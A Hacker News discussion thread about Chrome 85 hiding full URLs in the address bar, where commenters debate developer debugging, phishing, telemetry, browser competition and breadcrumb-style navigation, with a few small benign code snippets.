Google adds experimental setting to hide full URLs in Chrome 85 address bar (androidpolice.com)
869 points by vezycash on June 14, 2020 | 698 comments



While this might be useful for a casual user, hidden URLs are a huge problem for web developers. Asking a client for a screenshot is no longer enough; now I'll have to provide additional instructions on how to copy/paste the full URL when reporting issues.

Not to mention all the possible problems with misconfigured servers where the www and www-less domains lead to the same website, but some script refuses to work on one of them. While that was easy to spot with just a glance at the URL bar, now one has to do additional clicking or open devtools.

We are probably at the crossroads where developers need a separate, non-dumbed-down version of the browser.


I'm already annoyed by the hassle it has become to copy a substring of the URL into the clipboard, due to the schemes being hidden. Nothing has been won by hiding http(s):// as well as the www subdomain.


I had a frustrating experience with this only yesterday.

I was trying to search for the word "aquarium", but Chrome kept filling in "https://aquarium.org". I would delete the ".org", and only the word "aquarium" was shown in the search bar, which was the word I was trying to search for.

Of course "https://" was hidden, so I was actually submitting "https://aquarium", which was not a valid domain, and it took many frustrated clicks and enters to actually google the word that was shown. Absolutely infuriating, as the true state of the search bar was hidden.


Even when the scheme is visible I have problems copying a URL substring. Chrome always wants to select the ENTIRE URL instead of just the subpath I'm double-clicking... endlessly frustrating >:(


Them acting like this is some kind of user experience thing is the most insulting part.


Most users' experience isn't the same as the developer's user experience.


But it is.

The URL bar is a disaster for end users. It's full of random junk that users can't read, so they stop trying, which means they can then be tricked by phishing websites hosted on any domain at all. Research shows about 25% of users don't look at the URL bar at all even when typing in passwords; they navigate purely by sight, so it's impossible to stop them being phished. The human cost of the resulting hacking is significant.

The fact that the software industry has routinely prioritised historical inertia, the needs of web developers, and all kinds of other trivialities over the security of billions of people is embarrassing. I'm glad to see the Chrome team finally get a grip on this and make the URL bar actually useful for people.


> The URL bar is a disaster for end users. [...] 25% of users don't look at the URL bar at all even when typing in passwords

"Side view mirrors are a disaster for drivers. 25% of drivers don't even check them before making a turn." [I'll stop the metaphor here, as I think my point was clear]

This change does exactly nothing to improve security. As for usability, it just puts one more layer of paint over the underlying "complexity" - and we've seen before how well that works (see basically every part of Windows 10 for examples).


As someone who has worked on the front line of the fight against phishing and account takeover in the past, I can assure you and others that you're dead wrong. Making this change was a recommendation I made to the Chrome team years ago because the number of people who would reliably type in their username and password to a site hosted on hacked web servers (supershop.co.hk/account_login.php etc) was just so high. And when those accounts got hacked, scamming and sometimes even extortion would follow.

Your side view mirror metaphor is unfortunately not clear at all. The side view mirror is simple and performs its function correctly as designed. It can't really be improved without totally replacing it with something else like a camera. Now of course not everyone will use the URL bar even if it's redesigned to work correctly. But right now the bar is practically designed to look as intimidating and useless as possible.

Perhaps you're so used to parsing URLs in your head you don't realise it, but URLs are a baroque and absurd design that nobody without training could properly figure out. It's basically random bits of webapp memory and protocols splatted onto the screen in a large variety of different encodings. In a desktop app dumping RAM straight onto the screen would be considered a severe bug. On the web it's tolerated for no good reason beyond history.

To give just one example that has regularly confused people in the past: URLs are read left to right except for the domain name (the important part) which is read right to left. You don't stop reading a domain name at .com, you stop reading it at the third slash or possibly a colon, but that form is rare.
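To make that concrete, here is a minimal sketch using the browser's built-in WHATWG URL API (the lookalike domain is invented for illustration):

  // The registrable domain sits at the END of the hostname, just before
  // the third slash, so "google.com" here is only a subdomain label.
  const deceptive = new URL("https://google.com.evil.example/accounts/login");
  console.log(deceptive.hostname); // "google.com.evil.example" <- the real site
  console.log(deceptive.pathname); // "/accounts/login" <- attacker-chosen noise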


As someone who has had to teach grumpy old high school teachers how to not fall for phishing and mitm attacks, I really can't see the problem here.

The way I used to teach was very simple and very effective: there are 3 parts to a URL - the first part tells you if the connection is secure, the second part tells you who you're connected to and the third part tells you where on that site you are. The first part needs to be httpS, the second part needs to be the site you're expecting and the third you can ignore. They're even shaded differently to make it easier to read. "If you're going to Google and the black part ends with anything but google.com, call IT" made sense to even the oldest and most reluctant people I've had to deal with. The problem was actually getting them to check every time and not forget.
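For anyone who wants to see those three parts programmatically, a small sketch with the browser's URL parser (the sign-in URL is just an example):

  const u = new URL("https://accounts.google.com/signin/v2?hl=en");
  u.protocol;            // "https:" -> part 1: is the connection secure?
  u.hostname;            // "accounts.google.com" -> part 2: who you're connected to
  u.pathname + u.search; // "/signin/v2?hl=en" -> part 3: where on the site you are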

It seems to me that this change will not help people without training, change nothing for people with training, and make sharing links even more confusing for everyone.

Are you saying someone is less likely to get phished on "supershop.co.hk" than on "http://supershop.co.hk/account_login.php", even where the http:// part is replaced with a red padlock and /... is grayed out?

I see only one real solution to phishing: don't let users type passwords manually. WebAuthn and password managers both automatically read the domain and won't try to authenticate on a domain that isn't a perfect match. I've had more success with that than with any other anti-phishing measure I've tried deploying (history-based domain trust, explicit trust-on-first-use popups, detecting Unicode gaps and domains in credential fields...).
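To illustrate why WebAuthn is phishing-resistant: the browser itself binds credentials to a domain via rpId, so a lookalike site on another domain can never request a matching assertion. A rough sketch (inside an async function; in practice the challenge comes from your server, and example.com is a placeholder):

  const assertion = await navigator.credentials.get({
    publicKey: {
      // In production the challenge is generated server-side, not locally.
      challenge: crypto.getRandomValues(new Uint8Array(32)),
      // The browser rejects this call unless rpId matches the
      // registrable domain of the page making the request.
      rpId: "example.com",
    },
  });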


Sure, absolutely. People understand domain names, they're found on billboards, adverts, business cards, all over the place. And it's a simple text match. Does the bar say "google.com" or "google.co.uk"? Yes? Then you're on Google. So when it's simple people get used to checking and can be reasonably told they're expected to do it.

The greying out and replacement of padlocks etc, the anti-phishing training, it's all just working around a historical design problem in browsers. There's no need for it to exist. Notably, mobile apps don't have this problem.


> Nothing has been won

Google could make an AMP-only web experience without dissent.

Hide the URL bar.

JavaScript -> WebAssembly.

Hiding all this benefits data collection and advertising. Seems obvious to me.


It is frustrating, isn't it?


>Probably we are at the crossroads where developers need separate, not dumbed-down version of browser.

Yes, we are.

Funny enough, Firefox has a 'Developer Edition', but that's just the Beta build with some features turned on by default.

https://www.mozilla.org/en-US/firefox/developer/


Firefox's still an option.


The quality of Firefox on Windows as software leaves much to be desired.

Due to slow loading, I'm considering whatever they call the Microsoft browser today.


Microsoft doesn't have a browser today; it's just repackaged Chrome supporting the same Blink monopoly.

I am honestly surprised Firefox on Windows is slow for you. I don't personally use Windows, but many on here say it works well there since v57.


I have tried to fix this slow loading problem. Happening on 2 separate gaming laptops with SSDs.

Maybe I don't know what to Google.


Try to DuckDuckGo "why is Firefox slow on Google sites" - or just try to guess the answer...


Blink isn’t a monopoly... yet.


For what it's worth I don't experience slow loading with Firefox on Windows, or any notable slowdown in any way.


I definitely do. FF being perceptibly slower than Chrome continues to keep me off it.


I only notice this on certain Google sites.


Start Firefox with the profile selector and try using a fresh new profile. Or start in safe mode. Some old, forgotten configuration or addons are sometimes the cause. For example, the privacy-enhancing addon ClearURLs disables ETag functionality by default, so all sites using ETags for caching content won't be cached. Big loss.
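For context, ETag revalidation is what lets the browser skip re-downloading unchanged resources. A hedged sketch of the round trip (URL invented; normally the browser does all of this transparently):

  const first = await fetch("https://example.com/app.js");
  const etag = first.headers.get("ETag"); // e.g. '"abc123"'
  // On revalidation the server can answer 304 Not Modified with no body.
  // Strip the ETag (as that addon does) and you get a full 200 every time.
  const again = await fetch("https://example.com/app.js", {
    cache: "no-cache", // force revalidation for the demo
    headers: etag ? { "If-None-Match": etag } : {},
  });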


Is this still true in Firefox >= 57?


Not in my experience.


Not in my experience.


Not for serious web development (ditto for Safari): the developer tools are atrocious compared to Chrome's, the battery life experience is way worse with FF, and while Chrome is a notorious CPU and RAM hog, FF is worse.

That combined with both FF and especially Safari being way behind in terms of standards adoption/development really sucks at the moment. Chrome desperately needs competition.


In my experience FF is not behind Chrome with new features. It's usually on par, or even better. Sure, Safari is annoying. But the developer tools in Firefox are alright. I even find them better when it comes to debugging CSS stuff.


It's odd that you mention how Chrome needs competition but also decry lack of features in other browsers. That is one of the ways they are attempting to monopolize the space.

The standards are meant to be agreed upon by several parties, including both Google and Mozilla. Google implements new features in order to control the way they work, instead of allowing input by all the parties involved. It's always faster for one company to just do whatever they want than for a group of organizations to come to an agreement on what to do. The slower way results in better and more equitable implementation for everyone though.


Why do you say so with such certainty, though? I find it nearly impossible that you never saw someone claiming the opposite. There's even such a response to your own comment so clearly this experience is not universal.


Google does have amazing access to data on how 80-90% of users are using the Internet; for many, Google is the entry point to their Internet experience. Maybe their data is telling them that the URL bar is basically unused?


That's probably because most advanced users turn off all telemetry when possible. And http://localhost is probably ignored in statistics anyway.


I mostly leave telemetry on in products I care about specifically so that my advanced use cases get logged.


That's admirable, but you are a minority within a minority.


Honestly, if most "advanced" users turn off the features that Google uses to gather data to improve UX, it's strong signal UX isn't important enough to "advanced" users for Google to optimize for it.


It doesn't matter if .1% of users turn off their telemetry, their use case wasn't going to be optimized for either way. In fact the Google employees themselves are part of that .1%, they don't need the data to tell them what's important to advanced users.


What? If most "advanced" users turn off telemetry then they want a terrible product?


Then they're valuing other things more than a UX that caters to them.


Yeah, like their privacy? Since when did getting a good product that respects your privacy become an oxymoron?


Automatic metrics are only one tool in a toolbox that includes focus testing and design aesthetic.

But if a whole subset of users exclude themselves from that tool, they're going to get the UX that's only as good as the other tools in the toolbox are capable of building.


You know software with good UX used to exist before telemetry became a thing?


Definitely, and it continues to exist after as well.

But telemetry gives web developers an extremely simple and convenient tool to know what users are actually doing without even inconveniencing the users with explicit questions. I've done web development with a good telemetry set built into a page, and it is extremely informative regarding how users actually use the tool, as opposed to how the UX designers have predicted flow through the tool will be.

To give a concrete example, a user might tell you that configuring permissions is "hard," and sitting with them during over-the-shoulder testing (which is expensive) might tell you a little bit about why. But without even asking the user, page telemetry can tell you that they are making a transition jump from the permissions configuration page to the page listing all of the resource names, because that's what's slowing them down: the UI didn't give them enough information to configure the resources, because we assumed they knew what the resources were named.
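Mechanically, that kind of page telemetry can be as small as one beacon per navigation; a hypothetical event (the endpoint and field names are invented):

  // sendBeacon queues the request so it survives the page unload,
  // which is why it's the usual choice for telemetry events.
  navigator.sendBeacon("/telemetry", JSON.stringify({
    event: "page_transition",
    from: "/settings/permissions",
    to: "/resources/list",
    ts: Date.now(),
  }));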

For a browser, anonymized usage stats can tell you whether most users keep all their bookmarks flat at the top of the bookmark bar or deeply nested in multiple subfolders, and that's usually valuable for deciding whether you want to emphasize a flat bar or folder management in the design.

If most power users disable automatic anonymous telemetry and also use deeply nested folders, no one should be surprised if deeply nested folders don't get better.


Yeah, invading people's privacy always makes things easier for everyone else, doesn't it? Doesn't mean people who care about it don't want or deserve quality...


"Deserve" is complicated. To a first approximation that ignores a lot of details... What have they done to "deserve" it? They didn't buy it. They aren't making the process of figuring out what they want particularly easy.

People who don't show up to vote also "deserve" a good government by virtue of being people who have to live in a governed society. It's harder to make one for them if the system for selecting leaders is missing their input, regardless of what they deserve.

Popping out of the government analogy and back to software, power users are also in a position where they are more capable of adjusting their experience to suit their needs. All things being equal, a company with finite resources to develop software should dedicate those resources to assisting the non-power users more often than power users.


While you argue your case, that one has to vocalise if one wants something, well, you are still ignoring the basic want of not having your privacy violated and the fact that you can vocalise something willfully, without it being spied away from you. I'm also extremely suspicious of the suggestion that this is something only power users would want.


You can certainly vocalize something willfully. But the people who don't have to do any vocalization at all and are generating megabytes to gigabytes of data on how the application is used by their mere use of it are going to always have a default stronger voice than people who bother to show up on message boards to voice specific concerns.


I actually agree that if you are willing to ignore privacy concerns and a potentially large part of your userbase, then you can simply send megabytes to gigabytes of telemetry and pretend that is the best you could have done and that you have the best data. I'm simply saying that's not a good idea.


a) It's not a large part of the user base who switches off telemetry and they have the telemetry to know that

b) for being "not a good idea", it's pretty much industry standard now for everything from business software to video games.


> a) It's not a large part of the user base who switches off telemetry and they have the telemetry to know that

So you're claiming that it is typical for software with telemetry support to ignore your choice and still send telemetry about you turning off telemetry? That sounds wrong, but I cannot say I investigated this deeply.

> b) for being "not a good idea", it's pretty much industry standard now for everything from business software to video games.

As I understood the discussion, we were in fact discussing whether this is a good idea and whether it makes sense, so I think it's fair game to comment on it. As for it being an industry standard, that sounds like an overgeneralization. It is certainly not typical of software I use.


> So you're claiming that it is typical for software with telemetry support to ignore your choice and still send telemetry about you turning off telemetry? That sounds wrong, but I cannot say I investigated this deeply.

No; I'm saying missing data leaves holes that can be measured. They know, for example, how many people have downloaded Chrome and how many daily Chrome users they get at google.com (because Chrome will still send a valid UA string if it has telemetry turned off). They can estimate how many users have telemetry turned off from those signals to a pretty decent degree of accuracy; certainly enough to know whether telemetry is telling them about 90% of users or 30%.

For (b), I'm curious what software you use. It's pretty standard in games, online apps, and business software. It's absent in a lot of open-source (mostly because a lot of open-source lacks a centralized vendor who would be willing to pay the cost to collect and interpret that data to improve the software).


Is Chrome's telemetry so invasive that it reports about all URLs visited? Otherwise I don't see how daily Chrome visitors on google.com would be helpful in this estimate.

I avoid online apps, I don't play a lot of games (and if I do, they're not big titles which are likely to have telemetry) and yes, I primarily use FOSS.

> (mostly because a lot of open-source lacks a centralized vendor who would be willing to pay the cost to collect and interpret that data to improve the software).

This is almost surely an element of it, but I think a respect for privacy and a general distaste for telemetry among FOSS users are more important.


But they don't have that signal...


Missing data leaves its own wake. Google has numbers to extrapolate how many turn off usage reporting. They lack an automated signal for how those users use the tools.


I do this as well. As an end-user, I actually find some telemetry useful to diagnose things like:

* Apple Watch battery cycle count (not viewable in any UI but is viewable in telemetry logs)

* Clues about why a particular app recently crashed


That would be nice. They should share that data to help others understand the decision they are making. Or at least they could reference the data in their decision making.


There is a trick, at least for Chrome before 85: if you install the Google-made extension "Suspicious Site Reporter", it will show the full URL including the protocol (which you can't even do with flags, so it tampers with something internal, which means they didn't have to do this at all).


Asking a user to install "suspicious site reporter" in order to send a bug report is going to throw up a few problems.


I highly doubt a non-default extension has extra permissions that aren't available to regular extensions...

Can anyone reproduce this?


The extension ID is literally hard-coded in the scheme-hiding code. https://source.chromium.org/chromium/chromium/src/+/master:c...


That a proprietary extension can get preferential features illustrates that Chromium is open source in name only.


Hardly. If you look at firefox's source, you will find several extensions that are hard-coded for special handling. This is not new.


True, but the distance between Firefox source and Firefox is config+compile.

You cannot compile Chrome. I've heard that Chromium can be compiled and run, but I've never actually seen it, or heard of anyone using it professionally.


I'm not sure what your point is... You thought it was weird that an extension would get preferential treatment, and I pointed out that this is true for Firefox also.


My point is that you are correct.

There are other factors at play which mitigate the preferential treatment, but it's definitely there in Firefox as well.


I looked into it several months ago and it looks like that extension is whitelisted to do it. If you try to repack the crx file and install it, the address bar doesn't get changed.


Developers, at least the experienced ones, never left Firefox. For the new developers who got hooked on Chrome over the last 10-15 years, it's time to move to a developer-friendly browser.

At this point IE becomes more useful.


This is just simply inaccurate. I have 25 years of web dev experience and left Firefox because Chrome's dev tools were far, far superior to those of Firefox.


Blink is the most common browser engine. Firefox has some nice developer tools, but if you don't test in Blink throughout the day then you're just asking for problems.


Blink will remain the most common if that's all devs continue to optimize for. Not a way to change anything for the better.


And it's what devs will continue to optimize for while it continues to be most common.

The goal of most web developers is to make pages users can use, not get mired down in the never-ending browser wars.


It's the most common because devs optimize for it. That's a Catch 22 you can't break out of if you continue to optimize for it, an infinite loop.


Yes. That is network effect.

As the smaller vendor, it's incumbent upon Mozilla to break it. Expecting individual devs to do it collectively when it really isn't in their selfish interests is waiting for a unicorn to appear.


> As the smaller vendor, it's incumbent upon Mozilla to break it.

That's kind of impossible to do for a smaller vendor without wider developer cooperation.

I remember Mozilla only started to breach IE's dominance once devs were so sick of IE that they installed Firefox on their mom's computer despite tons of sites being made for IE.

It's possible for something like it to happen again with Chrome, but less likely since Google's a lot smarter and not too lazy to implement latest tech, so it will sure take longer without some activism and evangelism from web devs.

> expecting individual devs to do it collectively when it really isn't in their selfish interests is waiting for a unicorn to appear

Selfishness is a much more complicated thing than people give it credit for. A lot of 'selfless' acts could alternatively be described as selfish in that they make one feel good. Free software developers already do a lot of work for the wider community, where it would probably be a lot easier to just use the proprietary, already feature-rich counterpart than to try to develop a libre alternative. But the movement understands that long-term, having as much free software as possible is what will in the end help preserve general-purpose computing in the sea of silos. It takes some discipline, sure, but long-term it's actually in one's selfish self-interest.


But that's the thing, if Google is responsive enough to implementing new technologies and improving their browser, there's no reason for most web devs to advocate for an alternative browser. A (high-quality) monoculture is actually much much easier on most web devs, because it minimizes the number of browsers they have to support for quirks.


> A (high-quality) monoculture is actually much much easier on most web devs, because it minimizes the number of browsers they have to support for quirks.

Short-term, sure. Long-term it opens devs to Google's whims and makes the "open" web barely more open than Apple's AppStore.

But that's short-term vs long-term thinking and I can't deny most would prioritize the short-term. Here's hoping there's still enough idealists, even among web devs to avoid that fate and bring about for the web what GNU did for UNIX in the 80/90s.


GNU did great things for UNIX. It hasn't really demonstrated much utility in the user experience improvement space. The flow there, in general, appears to be that the big, closed source commercial interests devise new approaches for user interface operation and the open source community copies the ones that work.

The only space I can name off the top of my head where open-source architectures have outstripped Windows and Mac in UX is virtual desktops.


If you're talking casual computer experience, KDE's still way more customizable than any of the commercial desktop environments out there.

Of course proprietary software has more funding to hire designers and such, but in terms of actual functionality, I'd contest your claim.

If you're talking developer user experience, it's not even a race. The FLOSS ecosystem has a landslide lead here. In fact the whole point of WSL is to try to keep devs on the Windows platform by bringing that experience to Windows more directly.


> If you're talking casual computer experience, KDE's still way more customizable than any of the commercial desktop environments out there

Customizability is orthogonal to out-of-the-box UX, the original axis of comparison here. In fact, the two are often at odds.


Same as saying a benevolent tyrant is the best government. Viewed from a certain angle it could arguably be true, yet none of us would trade democracy for it, because we understand quality and efficiency are not the only factors; they need to be weighed against other ethical and social ones.

The history of biological evolution shows that monocultures invariably fail catastrophically. Diversity is the main way to guard against unpredictable events of the future. Software is not exempt from these general rules I'd presume.


I'd be conservative extrapolating from lessons of government and biology to software engineering principles. Software doesn't change via random mutation and natural selection pressure; most open source projects are benevolent dictatorships of some flavor or other.


Sorry to interrupt the party here, but I feel compelled to point out that Firefox's engine is actually the third most common, after Blink and WebKit. The web is not and will not be a monoculture as long as the iPhone exists. There are already two ~trillion-dollar juggernauts involved.


Blink is a fork of WebKit though. Firefox is the last big non-WebKit browser afaik.


Perhaps Mozilla should never have made breaking changes that pushed people away? The UI change that killed my extensions made me look elsewhere. Chrome's much faster js engine sealed the deal.

I've looked into switching back to Firefox, but what I've found is that they don't allow me to use my own extensions. I would have to use a beta version of Firefox or submit all of my extensions that only I use for approval to Mozilla or have to reinstall my extensions every time I close Firefox. None of these seem good options to me.


If you're relying on bug reports to find why a page is broken you're in for a bad time because 99% of the time the user isn't going to report anything. They're just going to think your page is broken and stop using it. Use a telemetry and error reporting service like Sentry or Rollbar. These services can strip sensitive data on the client before it gets logged.


Not every bug results in an error being thrown or any other signal that you could automatically detect. From my experience most of them are way more subtle.


While parent’s point is for devs, any kind of support situation falls into the same issues.

Grandparents/friends/org users not being sure they're on the right site after a redesign, not seeing Amazon in the right language, etc. There are countless questions that can be solved faster by looking at the URL.


Sentry only captures software exceptions. It doesn't tell you a page is rendering badly in the user's browser.


You can send your own events to Sentry. It's not just for exceptions.


How do you make an event for "rendering looks weird", or "text is unreadable"?


Have a "report issue" button which leverages Sentry's (or your own, or some other service's) metadata collection and sends a report to you.


My QA team sends me URLs and screenshots sometimes. Often the first thing I look for on a screenshot is the URL.


How can I tell you don't work in IT? Almost all companies including mine have ONE site to choose from to do any one thing. If it doesn't work, they either ask their colleagues (which only works if it's not the first time someone is using this around them) or create a ticket for IT.


I've been a web developer for about 25 years. I can assure you if something doesn't work the users usually won't raise a ticket. They'll work around the problem. On the occasions when they do raise a ticket it'll usually contain minimal information. Having a telemetry system to correlate it against gives you some information to use to debug the problem. That's helpful.

Understanding that users have more important things to do than spend time on bug reports is an important lesson to learn. If you can gather data without relying on someone whose job is to worry about other things then you will make everyone's life easier.


I actually wouldn't mind if the URL bar was replaced with a breadcrumb bar on some sites, like news and forums. Imagine something like

Example.com > Worldnews > 2020 > 06 > 14 > Big aquatic monster spotted outside of Tokyo

or

forum.example.com > Sport > Football > Spain > Real Madrid

It could then work like in Explorer in Windows 10, where you can press one of the breadcrumb separators and see a menu with siblings, or go straight to all news this month. It could use some manifest file in a standard format on the server for the directory information.

Of course, this should never replace the URL completely; you should always be able to get to it easily. But URLs aren't necessarily always the best solution for navigation. We tokenize code and apply different colors, mouse-over pop-ups, and links, so why should the URL bar be a long raw text string when it really contains structured data?

This Google nonsense of hiding everything except the domain is not a good solution IMO; it doesn't solve a problem and makes it harder to navigate, not easier.


I really dislike any attempt to modify strings like this. I find it invariably causes problems in edge cases. What if a site handles slashes differently to how Google expects? Where do GET arguments go? What if I want to modify the URL? Breadcrumbs are great when each part is navigable, but does example.com/worldnews/2020/06 actually lead anywhere, or is it an invalid address for the site? I have absolutely no interest in Google being allowed to dictate what should and should not be a valid address.

Probably worse than the change itself, though, is the tendency of anyone who makes such a change to start playing fast and loose with actually representing the underlying address. You mention Windows 10's address bar - it's one of the worst offenders. My Windows Explorer is currently sitting in my downloads folder, which is at "C:\Users\Wyatt\Downloads". The address bar reads "This PC > Downloads". When I click on the address bar to edit the address, it changes to just "Downloads". What part of all of this is in any way useful to me or the likely action I'm trying to take when I click on the address bar?


"This PC > Downloads" may point to the same directory as "C:\Users\Wyatt\Downloads", but Explorer may also handle or display differently or with different options. I've had various issues with this, such as not being able to copy the full actual path from the address bar, a sub-folder in one of these "This PC" folders or libraries showing no columns with no option to show them, and sometimes being indistinguishable from the Public folder. The full path matters in Explorer, Finder, and browsers, and should never be hidden without an easy visible way to show the full path or have it always show.


In Windows Explorer, if you click to the right of the breadcrumbs, you will get a text input with the full path to the current directory. If a solution for URLs were to attempt to switch to breadcrumbs (seems like it should be site-configurable via a meta tag or something), then a similar click to the right of the breadcrumbs could expose the underlying URL.


If you click Downloads, it won't give the C:\Users\User\Downloads path; it'll just give Downloads.


> I really dislike any attempt to modify strings like this. I find it invariably causes problems in edge cases. What if a site handles slashes differently to how Google expects?

I think it would have to be some standard format that websites use, not just string manipulation in the browsers. And certainly not some Google dictated feature! For the same reason, each part would have to be navigable on these sites, to work as I described. There's various possible solutions, like meta tags or some manifest like breadcrumbs.jsonld mentioned in another comment.

The fact that Windows Explorer doesn't show the full URL in special folders is a separate issue, I only mentioned it for the breadcrumbs example.


If you're talking about something other than manipulating the URL, I don't understand what problem you're solving. Sites which believe that breadcrumbs would be helpful for navigation already have breadcrumbs, I see no reason to force it on everyone else.

But I disagree with you that not showing the full address in Windows Explorer is a separate issue. In my experience loss of edge-case functionality is a core aspect of changing interfaces. Maybe in another world the address would be preserved, and my use case would still work. But someone else's unusual use would not.


Instead of manipulating the URL it would replace it, and instead of each site doing it its own way it would be handled by the browser, in the browser UI. Sites can implement their own back button too; that doesn't mean that's where it belongs.

Think about how PowerShell uses objects instead of text to chain commands together. The address isn't just text, it's structured data; why not treat it as such and make it more useful?


Your arguments are definitely salient.

However, I think there is something to this idea - a breadcrumb style approach by default in Chrome would encourage developers to use paths in more standard ways that refer to resources, not heavy parameter coupling. As you noted, there are technical barriers to implementing this solution, which might encourage some other good things - servers providing resource discovery so that the browser can understand valid paths when visiting a site.


I address that in my point: Google deciding what paths developers should use is precisely what I don't want. I'll decide what resources should be discoverable on my site, not Google. I'll decide what paths should be valid, not Google.

Google has too much power to dictate standards already, and has been quite happy to use that power for their own sake, rather than the good of the user. I'm not interested in giving them any more.


My original point was not about Google specifically, it was about a new feature in browsers in general. I absolutely agree that Google have too much power already.

And like I wrote in my first post, the resource discoverability could be handled by the site itself via some manifest file in a standard format, like robots.txt. It wouldn't be dictated by anybody else.


I find the way Explorer in Windows 10 handles this behavior to be annoying and inconvenient. It finds ways to change paths into new canonical locations, for example browse to C:\Users\Yourname and instead of giving you breadcrumbs like Local Disk > Users > Yourname, it simply shows "Yourname" as a special home folder. When you click back in the address bar, there are no breadcrumbs anymore, it's erased your trail.

Attempts to make things simpler by hiding the truth about where you really are in navigation seems like a way to make the web less discoverable except by Google. If you're on a web site you can usually learn more about its structure based on URL format. This makes that more difficult.


But there's nothing stopping websites from offering that without browser support. It can just show that at the top of the page. Everything it provides is under the authority of the website. The URL needs to be provided by the browser because it's not entirely under the authority of the website, but that's not the case for a breadcrumb bar.


Yes, imagine if the browser vendors decided to _improve the usability of the URL bar_ instead of trying to remove it...

The only difference between

  Example.com > Worldnews > 2020 > 06 > 14 > Big aquatic monster spotted outside Tokyo
  forum.example.com > Sport > Football > Spain > Real Madrid
and

  https://example.com/worldnews/2020/06/14/big-aquatic-monster-spotted-outside-tokyo
  https://forum.example.com/sport/football/spain/real-madrid
is a little bit of reformatting and upcasing and linkifying (or otherwise making selectable) the individual path segments of the URL.

And probably some clever logic to deal with the randomforum.php?fid=12345&tpcid=984.3&page=5 goop that is still all-too-common... :/
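For the well-behaved, path-shaped URLs, that reformatting really is small; a sketch (which entirely ignores the query-string goop case):

  function toBreadcrumbs(raw: string): { label: string; href: string }[] {
    const url = new URL(raw);
    const segments = url.pathname.split("/").filter(Boolean);
    // Each crumb keeps a clickable prefix of the path.
    return segments.map((seg, i) => ({
      label: decodeURIComponent(seg).replace(/-/g, " "),
      href: url.origin + "/" + segments.slice(0, i + 1).join("/"),
    }));
  }
  // toBreadcrumbs("https://example.com/worldnews/2020/06/14/big-aquatic-monster")
  // -> worldnews > 2020 > 06 > 14 > big aquatic monster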


>And probably some clever logic to deal with the randomforum.php?fid=12345&tpcid=984.3&page=5 goop that is still all-too-common... :/

You say that as though websites like that are random small sites. HN has that kind of a URL, so do YouTube and Google.


Hacker News doesn't have breadcrumbs either. The concept of a directory hierarchy inherently doesn't fit.

You could try to map the parent ==> child relationship of every individual post URL, which might be cool, but think about how long the URLs would get.

For sites with breadcrumbs though, the URL absolutely should follow the crumbs (and I've argued for such at my company).


> I actually wouldn't mind if the URL bar was replaced with a breadcrumb bar on some sites ...

Which sites?

Anyway, almost everyone else would mind. Especially if there was no option to revert to normal behaviour.

> It could then work like in Explorer in Windows 10, ...

That sounds like the worst of both worlds. If people want Explorer in Windows 10 behaviour - can't they just run Explorer in Windows 10?

If people want Chrome as it was yesterday, they've basically got no option now.

> But URLs aren't necessarily always the best solution for navigation.

The Chromium devs demonstrated their lack of interest in being able to navigate via URL / location bar a half decade ago when they changed the default on all operating systems to be single-click in location bar to 'select the whole address'.

I'm beginning to think they are not our friends.


Note this is talking about Explorer, more recently named File Explorer, rather than Internet Explorer, the browser.


Argh, of course. My mistake.

I typically run up breadcrumbkiller as part of any Microsoft Windows desktop build, so I rarely see that configuration for long.


For myself (and I'd wager most people), I want to clear the URL and go to a totally different URL much more often than I want to manually manipulate the URL I'm currently on, so I like the change in default. Many casual users probably didn't even know a quick way to select the whole URL when it wasn't the default.


The option they have is Firefox


There were several extensions that transformed the location bar like you propose, which naturally just did a simple transformation of the domain, path, and query segments into clickable buttons producing breadcrumbs. It was a delight to use, and I've missed them in Firefox since the Quantum leap prevented them from working any longer.

https://www.ghacks.net/2011/03/01/improve-firefoxs-urlbar-wi...

By default they worked very similarly to the aforementioned Windows Explorer bar, which in the focused state with keyboard input turns into a "raw" text field.


On some sites, this could be done using breadcrumbs.jsonld:

https://developers.google.com/search/docs/data-types/breadcr...

Sadly not used everywhere, but maybe browser support would encourage its usage by site owners.
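For reference, the markup is a schema.org BreadcrumbList embedded in a script tag of type "application/ld+json"; it looks roughly like this (URLs reuse the forum example from above):

  {
    "@context": "https://schema.org",
    "@type": "BreadcrumbList",
    "itemListElement": [
      { "@type": "ListItem", "position": 1, "name": "Sport",
        "item": "https://forum.example.com/sport" },
      { "@type": "ListItem", "position": 2, "name": "Football",
        "item": "https://forum.example.com/sport/football" }
    ]
  }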


I’ve implemented this on my site. The pain in the ass is that Google will only sometimes show you the breadcrumbs, so it’s very difficult to tell if you encoded it correctly.


Very few URLs are perfectly hierarchical in a way that would work with this scheme. For example, look at the URL of this page you're reading now.


I think that's a great example of the benefits though. HN could continue to use their fairly opaque URLs in the background, but instead show something like

news.ycombinator.com > 2020 > 06 > 14 > Google hides full addresses in URL bar on Chrome 85

This makes it easy to not only see where you are, but also quickly click on a part of the address to go to that level of the hierarchy, or to a sibling like yesterday's posts. It makes sense that a forum like this would have a way to see all posts from a day, month, or year.

Of course, most if not all users here are comfortable with URLs so they're probably not the ones that would benefit the most. But I think most common users, the ones who Google everything instead of typing in an address, would use the breadcrumb bar while today they probably see the URL as some weird text string they have little interest in or understanding of.


While we often create a mental map between some sort of logical hierarchy and the segments of the URL, this doesn't have to be the case. The specific domain should be the authority on this, not the general-purpose tool used to access it.


There was an extension in Firefox that used to do exactly this. Seems like it did not survive the Mozilla War Against Addons, unfortunately.


At chrome://flags there is one called #omnibox-context-menu-show-full-urls, which I have turned on.

This enables you to right-click on the address bar and turn on the option "Always show full URLs". It will then always show the full URL including the protocol, but I suspect they will remove this flag at some point.


I don't think they will remove it soon, since it was just added¹ after a lot of complaints about the default behavior².

Now how does this new flag interact? Has anyone enabled both to see?

1: https://bugs.chromium.org/p/chromium/issues/detail?id=106157...

2: https://bugs.chromium.org/p/chromium/issues/detail?id=883038...


A heads up for those with lots of tabs open: This requires a browser restart, and setting it once seems to set it for all profiles.


If you happen to close your browser and lose your tabs, use the reopen-closed-tab menu option; it'll bring back all the closed tabs (even if there were multiple).


Even safer is to use an extension like Session Buddy, to explicitly save tabs and windows, including exporting to files.


I can't find this option on Chrome on Linux. I had to get an extension to show the full URL, but it only works for 'https://' URLs, not for 'http://'.

This drives me crazy when debugging. Whenever I copy-paste IP addresses from the browser address bar into my console, I have to manually delete the `http://` at the front. I work on a P2P project so this is an extremely common situation for me.


Are you running version 83 or later? I think they introduced the flag in that one.

Another solution for Windows and macOS users (no Linux, sadly) is to use Edge Chromium, which does it by default, if you prefer to donate your data to Microsoft rather than Google, like me :)


Oh wow, http:// and https:// are back! I've been waiting years for that option.


